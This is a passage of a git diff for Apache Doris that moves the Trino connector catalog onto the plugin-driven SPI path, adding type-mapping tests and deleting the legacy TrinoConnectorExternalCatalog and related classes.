ct.getTypeName()); + Assertions.assertEquals(2, ct.getChildren().size()); + Assertions.assertEquals("STRING", ct.getChildren().get(0).getTypeName()); + Assertions.assertEquals("BIGINT", ct.getChildren().get(1).getTypeName()); + } + + @Test + public void testStructCarriesFieldTypes() { + RowType row = RowType.rowType( + RowType.field("a", IntegerType.INTEGER), + RowType.field("b", VarcharType.VARCHAR)); + ConnectorType ct = TrinoTypeMapping.toConnectorType(row); + Assertions.assertEquals("STRUCT", ct.getTypeName()); + Assertions.assertEquals(2, ct.getChildren().size()); + Assertions.assertEquals("INT", ct.getChildren().get(0).getTypeName()); + Assertions.assertEquals("STRING", ct.getChildren().get(1).getTypeName()); + } + + @Test + public void testUnknownTypeThrows() { + // An unmapped Trino type must fail loudly rather than silently produce a wrong type. + Assertions.assertThrows(IllegalArgumentException.class, + () -> TrinoTypeMapping.toConnectorType(UuidType.UUID)); + } +} diff --git a/fe/fe-core/pom.xml b/fe/fe-core/pom.xml index ec53a24a75e23f..f78b2068b5b51a 100644 --- a/fe/fe-core/pom.xml +++ b/fe/fe-core/pom.xml @@ -736,10 +736,6 @@ under the License. org.immutables value - - io.trino - trino-main - io.airlift concurrent diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index f8b4f5a034098c..72526c41df41cf 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -120,6 +120,10 @@ private static Map buildEnvironment() { env.put("force_sqlserver_jdbc_encrypt_false", String.valueOf(Config.force_sqlserver_jdbc_encrypt_false)); env.put("jdbc_driver_secure_path", Config.jdbc_driver_secure_path); + // The trino-connector plugin runs in an isolated classloader and cannot read FE + // Config (it would see its own bundled copy with default values). Pass the + // configured plugin dir through the engine environment instead. + env.put("trino_connector_plugin_dir", Config.trino_connector_plugin_dir); return Collections.unmodifiableMap(env); } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java index a5afd90dfc5883..9b7beffcfb37d7 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java @@ -30,7 +30,6 @@ import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalogFactory; import org.apache.doris.datasource.test.TestExternalCatalog; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalCatalogFactory; import org.apache.doris.nereids.trees.plans.commands.CreateCatalogCommand; import com.google.common.base.Strings; @@ -48,9 +47,9 @@ public class CatalogFactory { private static final Logger LOG = LogManager.getLogger(CatalogFactory.class); // Only these catalog types are routed through the SPI connector path. - // Other types (hms, iceberg, paimon, trino-connector, hudi, max_compute) still use + // Other types (hms, iceberg, paimon, hudi, max_compute) still use // their built-in ExternalCatalog implementations until their ConnectorProviders are fully ready. - private static final Set SPI_READY_TYPES = ImmutableSet.of("jdbc", "es"); + private static final Set SPI_READY_TYPES = ImmutableSet.of("jdbc", "es", "trino-connector"); /** * create the catalog instance from catalog log. @@ -144,10 +143,6 @@ private static CatalogIf createCatalog(long catalogId, String name, String resou catalog = PaimonExternalCatalogFactory.createCatalog( catalogId, name, resource, props, comment); break; - case "trino-connector": - catalog = TrinoConnectorExternalCatalogFactory.createCatalog( - catalogId, name, resource, props, comment); - break; case "max_compute": catalog = new MaxComputeExternalCatalog( catalogId, name, resource, props, comment); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java index 44de21858698b6..4529bc7e5e43f2 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java @@ -54,7 +54,6 @@ import org.apache.doris.datasource.paimon.PaimonExternalDatabase; import org.apache.doris.datasource.test.TestExternalCatalog; import org.apache.doris.datasource.test.TestExternalDatabase; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalDatabase; import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; import org.apache.doris.persist.CreateDbInfo; import org.apache.doris.persist.DropDbInfo; @@ -960,7 +959,7 @@ protected ExternalDatabase buildDbForInit(String remote case PAIMON: return new PaimonExternalDatabase(this, dbId, localDbName, remoteDbName); case TRINO_CONNECTOR: - return new TrinoConnectorExternalDatabase(this, dbId, localDbName, remoteDbName); + return new PluginDrivenExternalDatabase(this, dbId, localDbName, remoteDbName); case REMOTE_DORIS: return new RemoteDorisExternalDatabase(this, dbId, localDbName, remoteDbName); case PLUGIN: diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index e78be28583b3a8..3e2a0991174300 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -325,7 +325,7 @@ public void gsonPostProcess() throws IOException { // createConnectorFromProperties() and getType() can resolve the catalog type. if (logType != null && logType != InitCatalogLog.Type.PLUGIN && logType != InitCatalogLog.Type.UNKNOWN) { - String oldType = logType.name().toLowerCase(Locale.ROOT); + String oldType = legacyLogTypeToCatalogType(logType); if (catalogProperty.getOrDefault(CatalogMgr.CATALOG_TYPE_PROP, "").isEmpty()) { LOG.info("Backfilling missing 'type' property for catalog '{}' from logType: {}", name, oldType); @@ -340,6 +340,19 @@ public void gsonPostProcess() throws IOException { } } + // CatalogFactory type strings don't all match Type.name().toLowerCase(): + // TRINO_CONNECTOR → "trino-connector" (hyphen), not "trino_connector". + // Add cases here whenever a connector's CatalogFactory key diverges from + // the lowercase enum name. + private static String legacyLogTypeToCatalogType(InitCatalogLog.Type logType) { + switch (logType) { + case TRINO_CONNECTOR: + return "trino-connector"; + default: + return logType.name().toLowerCase(Locale.ROOT); + } + } + @Override public void onClose() { super.onClose(); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java index 020c3703ff07cb..4f5982dbc563ab 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java @@ -230,6 +230,10 @@ public String getEngine() { return TableType.JDBC_EXTERNAL_TABLE.toEngineName(); case "es": return TableType.ES_EXTERNAL_TABLE.toEngineName(); + case "trino-connector": + // TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName() returns null + // (no switch case in TableType.toEngineName), matching legacy behavior. + return TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName(); default: return super.getEngine(); } @@ -244,6 +248,8 @@ public String getEngineTableTypeName() { return TableType.JDBC_EXTERNAL_TABLE.name(); case "es": return TableType.ES_EXTERNAL_TABLE.name(); + case "trino-connector": + return TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.name(); default: return TableType.PLUGIN_EXTERNAL_TABLE.name(); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalog.java deleted file mode 100644 index e2db35707ddb7a..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalog.java +++ /dev/null @@ -1,329 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.common.DdlException; -import org.apache.doris.datasource.CatalogProperty; -import org.apache.doris.datasource.ExternalCatalog; -import org.apache.doris.datasource.InitCatalogLog.Type; -import org.apache.doris.datasource.SessionContext; -import org.apache.doris.trinoconnector.TrinoConnectorServicesProvider; - -import com.google.common.collect.ImmutableList; -import com.google.common.collect.ImmutableMap; -import com.google.common.collect.ImmutableSet; -import com.google.common.util.concurrent.MoreExecutors; -import io.airlift.node.NodeInfo; -import io.opentelemetry.api.OpenTelemetry; -import io.trino.Session; -import io.trino.SystemSessionProperties; -import io.trino.SystemSessionPropertiesProvider; -import io.trino.client.ClientCapabilities; -import io.trino.connector.CatalogServiceProviderModule; -import io.trino.connector.ConnectorName; -import io.trino.connector.ConnectorServicesProvider; -import io.trino.connector.DefaultCatalogFactory; -import io.trino.connector.LazyCatalogFactory; -import io.trino.eventlistener.EventListenerConfig; -import io.trino.eventlistener.EventListenerManager; -import io.trino.execution.DynamicFilterConfig; -import io.trino.execution.QueryIdGenerator; -import io.trino.execution.QueryManagerConfig; -import io.trino.execution.TaskManagerConfig; -import io.trino.execution.scheduler.NodeSchedulerConfig; -import io.trino.memory.MemoryManagerConfig; -import io.trino.memory.NodeMemoryConfig; -import io.trino.metadata.InMemoryNodeManager; -import io.trino.metadata.MetadataManager; -import io.trino.metadata.QualifiedObjectName; -import io.trino.metadata.QualifiedTablePrefix; -import io.trino.metadata.SessionPropertyManager; -import io.trino.operator.GroupByHashPageIndexerFactory; -import io.trino.operator.PagesIndex; -import io.trino.operator.PagesIndexPageSorter; -import io.trino.plugin.base.security.AllowAllSystemAccessControl; -import io.trino.spi.classloader.ThreadContextClassLoader; -import io.trino.spi.connector.CatalogHandle; -import io.trino.spi.connector.CatalogHandle.CatalogVersion; -import io.trino.spi.connector.Connector; -import io.trino.spi.connector.ConnectorFactory; -import io.trino.spi.connector.ConnectorMetadata; -import io.trino.spi.connector.ConnectorSession; -import io.trino.spi.connector.ConnectorTableHandle; -import io.trino.spi.connector.ConnectorTransactionHandle; -import io.trino.spi.connector.SchemaTableName; -import io.trino.spi.security.Identity; -import io.trino.spi.transaction.IsolationLevel; -import io.trino.spi.type.TimeZoneKey; -import io.trino.sql.gen.JoinCompiler; -import io.trino.sql.planner.OptimizerConfig; -import io.trino.testing.TestingAccessControlManager; -import io.trino.transaction.NoOpTransactionManager; -import io.trino.type.InternalTypeManager; -import io.trino.util.EmbedVersion; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.time.ZoneId; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.HashMap; -import java.util.LinkedHashSet; -import java.util.List; -import java.util.Locale; -import java.util.Map; -import java.util.Objects; -import java.util.Optional; -import java.util.Set; -import java.util.stream.Collectors; - -public class TrinoConnectorExternalCatalog extends ExternalCatalog { - private static final Logger LOG = LogManager.getLogger(TrinoConnectorExternalCatalog.class); - private static final String TRINO_CONNECTOR_PROPERTIES_PREFIX = "trino."; - public static final String TRINO_CONNECTOR_NAME = "trino.connector.name"; - - private static final List TRINO_CONNECTOR_REQUIRED_PROPERTIES = ImmutableList.of( - TRINO_CONNECTOR_NAME - ); - - private CatalogHandle trinoCatalogHandle; - private Connector connector; - private ConnectorName connectorName; - private Session trinoSession; - private ImmutableMap trinoProperties; - - public TrinoConnectorExternalCatalog(long catalogId, String name, String resource, - Map props, String comment) { - super(catalogId, name, Type.TRINO_CONNECTOR, comment); - Objects.requireNonNull(name, "catalogName is null"); - catalogProperty = new CatalogProperty(resource, props); - } - - @Override - public void onClose() { - super.onClose(); - if (connector != null) { - try (ThreadContextClassLoader ignored = new ThreadContextClassLoader( - connector.getClass().getClassLoader())) { - connector.shutdown(); - } - } - } - - @Override - protected void initLocalObjectsImpl() { - this.trinoCatalogHandle = CatalogHandle.createRootCatalogHandle(name, new CatalogVersion("test")); - // All properties obtained by this method are used by the trino-connector. - // We should not modify this map - trinoProperties = ImmutableMap.copyOf(catalogProperty.getProperties().entrySet().stream() - .filter(kv -> kv.getKey().startsWith(TRINO_CONNECTOR_PROPERTIES_PREFIX)) - .collect(Collectors - .toMap(kv1 -> kv1.getKey().substring(TRINO_CONNECTOR_PROPERTIES_PREFIX.length()), - kv1 -> kv1.getValue()))); - - ConnectorServicesProvider connectorServicesProvider = createConnectorServicesProvider(); - - this.connector = connectorServicesProvider.getConnectorServices(trinoCatalogHandle).getConnector(); - SessionPropertyManager sessionPropertyManager = createTrinoSessionPropertyManager(connectorServicesProvider); - - QueryIdGenerator queryIdGenerator = new QueryIdGenerator(); - this.trinoSession = Session.builder(sessionPropertyManager) - .setQueryId(queryIdGenerator.createNextQueryId()) - .setIdentity(Identity.ofUser("user")) - .setOriginalIdentity(Identity.ofUser("user")) - .setSource("test") - .setCatalog("catalog") - .setSchema("schema") - .setTimeZoneKey(TimeZoneKey.getTimeZoneKey(ZoneId.systemDefault().toString())) - .setLocale(Locale.ENGLISH) - .setClientCapabilities(Arrays.stream(ClientCapabilities.values()).map(Enum::name) - .collect(ImmutableSet.toImmutableSet())) - .setRemoteUserAddress("address") - .setUserAgent("agent") - .build(); - } - - @Override - public void checkProperties() throws DdlException { - super.checkProperties(); - for (String requiredProperty : TRINO_CONNECTOR_REQUIRED_PROPERTIES) { - if (!catalogProperty.getProperties().containsKey(requiredProperty)) { - throw new DdlException("Required property '" + requiredProperty + "' is missing"); - } - } - } - - @Override - protected List listDatabaseNames() { - ConnectorSession connectorSession = trinoSession.toConnectorSession(trinoCatalogHandle); - ConnectorTransactionHandle connectorTransactionHandle = this.connector.beginTransaction( - IsolationLevel.READ_UNCOMMITTED, true, true); - ConnectorMetadata connectorMetadata = this.connector.getMetadata(connectorSession, connectorTransactionHandle); - return connectorMetadata.listSchemaNames(connectorSession); - } - - @Override - public boolean tableExist(SessionContext ctx, String dbName, String tblName) { - makeSureInitialized(); - return getTrinoConnectorTable(dbName, tblName).isPresent(); - } - - @Override - protected List listTableNamesFromRemote(SessionContext ctx, String dbName) { - QualifiedTablePrefix qualifiedTablePrefix = new QualifiedTablePrefix(trinoCatalogHandle.getCatalogName(), - dbName); - List tables = trinoListTables(qualifiedTablePrefix); - return tables.stream().map(field -> field.getObjectName()).collect(Collectors.toList()); - } - - private ConnectorServicesProvider createConnectorServicesProvider() { - // 1. check and create ConnectorName - if (!trinoProperties.containsKey("connector.name")) { - throw new RuntimeException("Can not find trino.connector.name property, please specify a connector name."); - } - Map trinoConnectorProperties = new HashMap<>(); - trinoConnectorProperties.putAll(trinoProperties); - String connectorNameString = trinoConnectorProperties.remove("connector.name"); - Objects.requireNonNull(connectorNameString, "connectorName is null"); - if (connectorNameString.indexOf('-') >= 0) { - String deprecatedConnectorName = connectorNameString; - connectorNameString = connectorNameString.replace('-', '_'); - LOG.warn("You are using the deprecated connector name '{}'. The correct connector name is '{}'", - deprecatedConnectorName, connectorNameString); - } - - this.connectorName = new ConnectorName(connectorNameString); - - // 2. create CatalogFactory - LazyCatalogFactory catalogFactory = new LazyCatalogFactory(); - NoOpTransactionManager noOpTransactionManager = new NoOpTransactionManager(); - TestingAccessControlManager accessControl = new TestingAccessControlManager(noOpTransactionManager, - new EventListenerManager(new EventListenerConfig())); - accessControl.loadSystemAccessControl(AllowAllSystemAccessControl.NAME, ImmutableMap.of()); - catalogFactory.setCatalogFactory(new DefaultCatalogFactory( - MetadataManager.createTestMetadataManager(), - accessControl, - new InMemoryNodeManager(), - new PagesIndexPageSorter(new PagesIndex.TestingFactory(false)), - new GroupByHashPageIndexerFactory(new JoinCompiler(TrinoConnectorPluginLoader.getTypeOperators())), - new NodeInfo("test"), - EmbedVersion.testingVersionEmbedder(), - OpenTelemetry.noop(), - noOpTransactionManager, - new InternalTypeManager(TrinoConnectorPluginLoader.getTypeRegistry()), - new NodeSchedulerConfig().setIncludeCoordinator(true), - new OptimizerConfig())); - - Optional connectorFactory = Optional.ofNullable( - TrinoConnectorPluginLoader.getTrinoConnectorPluginManager().getConnectorFactories().get(connectorName)); - if (!connectorFactory.isPresent()) { - throw new RuntimeException("Can not find connectorFactory, did you forget to install plugins?"); - } - catalogFactory.addConnectorFactory(connectorFactory.get()); - - // 3. create TrinoConnectorServicesProvider - TrinoConnectorServicesProvider trinoConnectorServicesProvider = new TrinoConnectorServicesProvider( - trinoCatalogHandle.getCatalogName(), connectorNameString, catalogFactory, - trinoConnectorProperties, MoreExecutors.directExecutor()); - trinoConnectorServicesProvider.loadInitialCatalogs(); - return trinoConnectorServicesProvider; - } - - private SessionPropertyManager createTrinoSessionPropertyManager( - ConnectorServicesProvider trinoConnectorServicesProvider) { - Set extraSessionProperties = ImmutableSet.of(); - Set systemSessionProperties = - ImmutableSet.builder() - .addAll(Objects.requireNonNull(extraSessionProperties, "extraSessionProperties is null")) - .add(new SystemSessionProperties( - new QueryManagerConfig(), - new TaskManagerConfig(), - new MemoryManagerConfig(), - TrinoConnectorPluginLoader.getFeaturesConfig(), - new OptimizerConfig(), - new NodeMemoryConfig(), - new DynamicFilterConfig(), - new NodeSchedulerConfig())) - .build(); - - return CatalogServiceProviderModule.createSessionPropertyManager(systemSessionProperties, - trinoConnectorServicesProvider); - } - - private List trinoListTables(QualifiedTablePrefix prefix) { - Objects.requireNonNull(prefix, "prefix can not be null"); - - Set tables = new LinkedHashSet(); - ConnectorSession connectorSession = trinoSession.toConnectorSession(trinoCatalogHandle); - ConnectorTransactionHandle connectorTransactionHandle = this.connector.beginTransaction( - IsolationLevel.READ_UNCOMMITTED, true, true); - ConnectorMetadata connectorMetadata = this.connector.getMetadata(connectorSession, connectorTransactionHandle); - List schemaTableNames = connectorMetadata.listTables(connectorSession, prefix.getSchemaName()); - List tmpTables = new ArrayList<>(); - for (SchemaTableName schemaTableName : schemaTableNames) { - QualifiedObjectName objName = QualifiedObjectName.convertFromSchemaTableName(prefix.getCatalogName()) - .apply(schemaTableName); - tmpTables.add(objName); - } - Objects.requireNonNull(tables); - tmpTables.stream().filter(prefix::matches).forEach(tables::add); - return ImmutableList.copyOf(tables); - } - - public Optional getTrinoConnectorTable(String dbName, String tblName) { - makeSureInitialized(); - QualifiedObjectName tableName = new QualifiedObjectName(trinoCatalogHandle.getCatalogName(), dbName, tblName); - - if (!tableName.getCatalogName().isEmpty() - && !tableName.getSchemaName().isEmpty() - && !tableName.getObjectName().isEmpty()) { - ConnectorSession connectorSession = trinoSession.toConnectorSession(trinoCatalogHandle); - ConnectorTransactionHandle connectorTransactionHandle = this.connector.beginTransaction( - IsolationLevel.READ_UNCOMMITTED, true, true); - return Optional.ofNullable( - this.connector.getMetadata(connectorSession, connectorTransactionHandle) - .getTableHandle(connectorSession, tableName.asSchemaTableName(), - Optional.empty(), Optional.empty())); - } - return Optional.empty(); - } - - // BE need create_time key - public Map getTrinoConnectorPropertiesWithCreateTime() { - Map trinoPropertiesWithCreateTime = new HashMap<>(); - trinoPropertiesWithCreateTime.putAll(trinoProperties); - trinoPropertiesWithCreateTime.put("create_time", catalogProperty.getProperties().get("create_time")); - return trinoPropertiesWithCreateTime; - } - - public Connector getConnector() { - return connector; - } - - public ConnectorName getConnectorName() { - return connectorName; - } - - public CatalogHandle getTrinoCatalogHandle() { - return trinoCatalogHandle; - } - - public Session getTrinoSession() { - return trinoSession; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalogFactory.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalogFactory.java deleted file mode 100644 index b6e11565a4df6a..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalogFactory.java +++ /dev/null @@ -1,30 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.common.DdlException; -import org.apache.doris.datasource.ExternalCatalog; - -import java.util.Map; - -public class TrinoConnectorExternalCatalogFactory { - public static ExternalCatalog createCatalog(long catalogId, String name, String resource, Map props, - String comment) throws DdlException { - return new TrinoConnectorExternalCatalog(catalogId, name, resource, props, comment); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalDatabase.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalDatabase.java deleted file mode 100644 index 31ada04eeb68e5..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalDatabase.java +++ /dev/null @@ -1,37 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.datasource.ExternalCatalog; -import org.apache.doris.datasource.ExternalDatabase; -import org.apache.doris.datasource.InitDatabaseLog.Type; - -public class TrinoConnectorExternalDatabase extends ExternalDatabase { - public TrinoConnectorExternalDatabase(ExternalCatalog extCatalog, Long id, String name, String remoteName) { - super(extCatalog, id, name, remoteName, Type.TRINO_CONNECTOR); - } - - @Override - public TrinoConnectorExternalTable buildTableInternal(String remoteTableName, String localTableName, long tblId, - ExternalCatalog catalog, - ExternalDatabase db) { - return new TrinoConnectorExternalTable(tblId, localTableName, remoteTableName, - (TrinoConnectorExternalCatalog) extCatalog, - (TrinoConnectorExternalDatabase) db); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalTable.java deleted file mode 100644 index 20e82d0b53735b..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalTable.java +++ /dev/null @@ -1,263 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.catalog.ArrayType; -import org.apache.doris.catalog.Column; -import org.apache.doris.catalog.MapType; -import org.apache.doris.catalog.ScalarType; -import org.apache.doris.catalog.StructField; -import org.apache.doris.catalog.StructType; -import org.apache.doris.catalog.Type; -import org.apache.doris.datasource.ExternalTable; -import org.apache.doris.datasource.SchemaCacheValue; -import org.apache.doris.thrift.TTableDescriptor; -import org.apache.doris.thrift.TTableType; -import org.apache.doris.thrift.TTrinoConnectorTable; - -import com.google.common.collect.ImmutableMap; -import com.google.common.collect.Lists; -import io.trino.Session; -import io.trino.metadata.QualifiedObjectName; -import io.trino.spi.connector.CatalogHandle; -import io.trino.spi.connector.ColumnHandle; -import io.trino.spi.connector.ColumnMetadata; -import io.trino.spi.connector.Connector; -import io.trino.spi.connector.ConnectorMetadata; -import io.trino.spi.connector.ConnectorSession; -import io.trino.spi.connector.ConnectorTableHandle; -import io.trino.spi.connector.ConnectorTransactionHandle; -import io.trino.spi.transaction.IsolationLevel; -import io.trino.spi.type.BigintType; -import io.trino.spi.type.BooleanType; -import io.trino.spi.type.CharType; -import io.trino.spi.type.DateType; -import io.trino.spi.type.DecimalType; -import io.trino.spi.type.DoubleType; -import io.trino.spi.type.IntegerType; -import io.trino.spi.type.RealType; -import io.trino.spi.type.RowType; -import io.trino.spi.type.RowType.Field; -import io.trino.spi.type.SmallintType; -import io.trino.spi.type.TimeType; -import io.trino.spi.type.TimestampType; -import io.trino.spi.type.TimestampWithTimeZoneType; -import io.trino.spi.type.TinyintType; -import io.trino.spi.type.VarbinaryType; -import io.trino.spi.type.VarcharType; - -import java.util.ArrayList; -import java.util.HashMap; -import java.util.List; -import java.util.Locale; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Optional; - -public class TrinoConnectorExternalTable extends ExternalTable { - - public TrinoConnectorExternalTable(long id, String name, String remoteName, TrinoConnectorExternalCatalog catalog, - TrinoConnectorExternalDatabase db) { - super(id, name, remoteName, catalog, db, TableType.TRINO_CONNECTOR_EXTERNAL_TABLE); - } - - @Override - protected synchronized void makeSureInitialized() { - super.makeSureInitialized(); - if (!objectCreated) { - objectCreated = true; - } - } - - @Override - public Optional initSchema() { - // 1. Get necessary objects - TrinoConnectorExternalCatalog trinoConnectorCatalog = (TrinoConnectorExternalCatalog) catalog; - CatalogHandle catalogHandle = trinoConnectorCatalog.getTrinoCatalogHandle(); - Connector connector = trinoConnectorCatalog.getConnector(); - Session trinoSession = trinoConnectorCatalog.getTrinoSession(); - ConnectorSession connectorSession = trinoSession.toConnectorSession(catalogHandle); - - // 2. Begin transaction and get ConnectorMetadata - ConnectorTransactionHandle connectorTransactionHandle = connector.beginTransaction( - IsolationLevel.READ_UNCOMMITTED, true, true); - ConnectorMetadata connectorMetadata = connector.getMetadata(connectorSession, connectorTransactionHandle); - - // 3. Get ConnectorTableHandle - Optional connectorTableHandle = Optional.empty(); - QualifiedObjectName qualifiedTable = new QualifiedObjectName(trinoConnectorCatalog.getName(), dbName, - name); - if (!qualifiedTable.getCatalogName().isEmpty() - && !qualifiedTable.getSchemaName().isEmpty() - && !qualifiedTable.getObjectName().isEmpty()) { - connectorTableHandle = Optional.ofNullable(connectorMetadata.getTableHandle(connectorSession, - qualifiedTable.asSchemaTableName(), Optional.empty(), Optional.empty())); - } - if (!connectorTableHandle.isPresent()) { - throw new RuntimeException(String.format("Table does not exist: %s.%s.%s", trinoConnectorCatalog.getName(), - dbName, name)); - } - - // 4. Get ColumnHandle - Map handles = connectorMetadata.getColumnHandles(connectorSession, - connectorTableHandle.get()); - ImmutableMap.Builder columnHandleMapBuilder = ImmutableMap.builder(); - for (Entry mapEntry : handles.entrySet()) { - columnHandleMapBuilder.put(mapEntry.getKey().toLowerCase(Locale.ENGLISH), mapEntry.getValue()); - } - Map columnHandleMap = columnHandleMapBuilder.buildOrThrow(); - - // 5. Get ColumnMetadata - ImmutableMap.Builder columnMetadataMapBuilder = ImmutableMap.builder(); - List columns = Lists.newArrayListWithCapacity(columnHandleMap.size()); - for (ColumnHandle columnHandle : columnHandleMap.values()) { - ColumnMetadata columnMetadata = connectorMetadata.getColumnMetadata(connectorSession, - connectorTableHandle.get(), columnHandle); - if (columnMetadata.isHidden()) { - continue; - } - columnMetadataMapBuilder.put(columnMetadata.getName(), columnMetadata); - - Column column = new Column(columnMetadata.getName(), - trinoConnectorTypeToDorisType(columnMetadata.getType()), - true, - null, - true, - columnMetadata.getComment(), - !columnMetadata.isHidden(), - Column.COLUMN_UNIQUE_ID_INIT_VALUE); - columns.add(column); - } - Map columnMetadataMap = columnMetadataMapBuilder.buildOrThrow(); - return Optional.of( - new TrinoSchemaCacheValue(columns, connectorMetadata, connectorTableHandle, connectorTransactionHandle, - columnHandleMap, columnMetadataMap)); - } - - @Override - public TTableDescriptor toThrift() { - List schema = getFullSchema(); - TTrinoConnectorTable tTrinoConnectorTable = new TTrinoConnectorTable(); - tTrinoConnectorTable.setDbName(dbName); - tTrinoConnectorTable.setTableName(name); - tTrinoConnectorTable.setProperties(new HashMap<>()); - - TTableDescriptor tTableDescriptor = new TTableDescriptor(getId(), - TTableType.TRINO_CONNECTOR_TABLE, schema.size(), 0, getName(), dbName); - tTableDescriptor.setTrinoConnectorTable(tTrinoConnectorTable); - return tTableDescriptor; - } - - private Type trinoConnectorTypeToDorisType(io.trino.spi.type.Type type) { - if (type instanceof BooleanType) { - return Type.BOOLEAN; - } else if (type instanceof TinyintType) { - return Type.TINYINT; - } else if (type instanceof SmallintType) { - return Type.SMALLINT; - } else if (type instanceof IntegerType) { - return Type.INT; - } else if (type instanceof BigintType) { - return Type.BIGINT; - } else if (type instanceof RealType) { - return Type.FLOAT; - } else if (type instanceof DoubleType) { - return Type.DOUBLE; - } else if (type instanceof CharType) { - return Type.CHAR; - } else if (type instanceof VarcharType) { - return Type.STRING; - // } else if (type instanceof BinaryType) { - // return Type.STRING; - } else if (type instanceof VarbinaryType) { - return Type.STRING; - } else if (type instanceof DecimalType) { 